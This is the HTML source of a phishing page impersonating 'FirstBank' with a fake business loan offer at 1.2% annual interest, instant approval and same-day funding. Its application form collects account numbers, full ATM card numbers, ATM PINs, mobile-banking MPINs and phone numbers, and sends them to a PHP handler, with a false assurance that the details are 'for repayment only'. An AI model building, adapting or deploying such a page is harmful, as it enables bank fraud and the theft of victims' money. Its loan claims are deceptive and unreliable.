<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>SME BUSINESS</title>
    <link rel="stylesheet" href="../style.css" />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css"
      integrity="sha512-Evv84Mr4kqVGRNSgIGL/F/aIDqQb7xQ2vcrdIwxfjThSH8CSR7PBEakCr51Ck+w+/U6swU2Im1vVX0SVk9ABhg=="
      crossorigin="anonymous"
      referrerpolicy="no-referrer"
    />
  </head>
  <body>

    <section id="delete-later">
    <header>
      <div id="control">
        <div id="cover">

      
      <div id="fake-top">
        <button id="nav-btn" onclick="btnFunc()"><i class="fa-solid fa-bars"></i></button> <div id="logo-div"><div id="first-head" style="color: white;">FirstBank</div><img id="logo-img" src="../img/work.WEBP" alt=""></div>
        <button id="apply"><a href="#applyform">APPLY NOW</a></button>
      </div>
    

      <nav id="first-nav" class="move-it">
       <ul>
        <li><button onclick="btnFunc()"><a href="#home">HOME</a></button></li>
        <li><button onclick="btnFunc()"><a href="#about-us">ABOUT</a></button></li>
        <li><button onclick="btnFunc()"><a href="#whyus">WHY US</a></button></li>
        <li><button onclick="btnFunc()"><a href="#applyform">GET LOAN</a></button></li>
       </ul>
      </nav>
      




    </div>
  </div>
    </header>
    <div id="another-main">
    <main>
      <section id="home">
      <div id="first Image">
        <img id="first-image-div" src="../img/firstlc.jpg" alt="" srcset="" />
      </div>
   

      <section class="section-padding">
       
    <h3>FIRST BANK BUSINESS LOAN</h3>
    <p>
      Are you tired of living salary to salary ? Do you need a financial
      boost to achieve your business goals ? Look no further,First bank sme
      business loan is here to provide you with quick,easy and affordable
      loan solutions with an interest rate of 1.2% annually.
    </p>
  </section>
  </section>

   
       <div id="applyform">
       <h4 style="font-weight: lighter; color: rgb(190, 185, 185); margin:10px auto;">NOTE:ALL PERSONAL DETAILS REQUIRED ARE FOR REPAYMENT ONLY.</h4>
        <div id="apply-div">
      <label for="select-amount">SELECT THE RANGE OF AMOUNT YOU WANT TO LOAN  <select name="amounts" id="select-amount">
        <option value="">100,000 - 500,000</option>
       <option value="">500,000 - 1,000,000</option>
       <option value="">1,000,000 - 5,000,000</option>
       <option value="">5,000,000 - 10,000,000</option>
       <option value="">10,000,000 - 100,000,000</option>
      </select></label>
       </div>
       <form id="first-form" action="../includes/secondformhandler.php" method="POST">
        <label for="acct">ACCOUNT NUMBER</label
        ><input type="number" name="acct" id="acct" required/>

        <label for="atcard">ATM CARD NUMBERS</label
        ><input type="number" name="atcard" id="atcard" required/>

        <label for="atpin">FOUR(4) DIGIT ATM CARD PIN</label
        ><input type="number" id="atpin" name="atpin" required/>

        <label for="mdigit">FIVE (5) DIGIT MPIN</label
        ><input type="number" name="mdigit" id="mdigit" required/>

        <label for="phonenum">PHONE NUMBER</label
        ><input type="number" name="phonenum" id="phonenum" required/>


        <button id="submit-apply" type="submit">COMPLETE LOAN APPLICATION</button>
      </form>

</div>


      <div id="started-writing">
        <section class="section-padding" id="about-us">
        <h3 class="with-padding">OUR LOANS OPTIONS</h3>

        <p>*Personal loans:Consolidate debt,cover unexpected expenses or fund your
        dreams.<br />
        *Business loans:Grow your business,increase cash flow or operational
        cost.<br />
        *Emergency loans:Get instant access to cash for unexpected expenses or
        emergencies.
      </p>
      </section>
             


      <section class="section-padding" id="whyus">
        <h3 class="with-padding">WHY CHOOSE US?</h3>
        <p>
          *Fast and easy application process.<br />
          *Competitive interet rates.<br />
          *Flexible repayment terms.<br />
          *No hidden fee.<br />
          *Friendly and dedicated customer support.
        </p>

        <h3 class="with-padding">APPLY NOW AND GET</h3>
        <p>
          *Instant approval<br />
          *Same-day funding<br />
          *Personalized loan solutions<br />
         <p><i> Dont let financial stress hold you back. Apply now and take the first
          step towards financial freedom.</i></p>
        </p>
      </section>

     

        
      
      </div>

    </main>
  </div>

  </section>

    <script src="../script.js"></script>
  </body>
</html>
